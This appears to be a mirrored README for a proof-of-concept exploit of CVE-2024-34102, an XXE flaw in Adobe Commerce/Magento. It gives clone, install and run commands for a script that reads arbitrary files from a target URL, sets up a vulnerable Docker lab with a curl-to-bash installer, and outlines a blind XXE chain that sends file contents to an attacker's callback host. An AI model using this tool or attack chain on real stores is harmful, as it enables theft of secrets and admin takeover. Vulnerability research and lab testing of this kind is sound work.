CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Source

https://github.com/EQSTSeminar/CVE-2024-34102

Associated Vulnerability

Title:XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)
Description:Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

Description

PoC for CVE-2024-34102

Readme

# CVE-2024-34102
★ Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. ★
## Description
CVE-2024-34102 : Adobe Commerce XXE vulnerability
description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
## How to use
### Git clone
```
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
```
### Install packages
```sh
pip install -r requirements.txt
```
### Command
```sh
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
```

### Example
```sh
python CVE-2024-34102.py https://magento.test -f /etc/hosts
```

### Output
![image](https://github.com/user-attachments/assets/1320573f-bb46-4d34-b2bf-42c0a8ce28fd)

## Vulnerable Environment Based on Docker
Thanks to markshust's Docker Configuration for Magento, It isn't hard to make the vulnerable development enviromnet. 
https://github.com/markshust/docker-magento
```sh
# Create your project directory then go into it:
mkdir /opt/magento
cd $_

# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl

# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/

# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.

# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts
```

![image](https://github.com/user-attachments/assets/4c556255-41c5-489a-9adb-a7bcb4e24169)

## PHPSTORM
You can debug your magento using PHPSTORM.

### 1. Turn on your xdebug thru the following command:
```sh
bin/xdebug enable
```

### 2. And then setup your PHPSTORM like:
![image](https://github.com/user-attachments/assets/b4554989-d2af-452c-ada9-28b4b0352060)

..And then you can debug your magento.

# Attack Scenario
Create callback URL (mocky api) -> Blind XXE attack (CVE-2024-34102) -> Send file contents to attacker's instance (SSRFUtility) -> Read the attacker's instance (SSRFUtility)

# Disclaimer
This repository is not intended to be XXE exploit to CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

# EQST Insight
We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications.
https://www.skshieldus.com/eng/business/insight.do

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!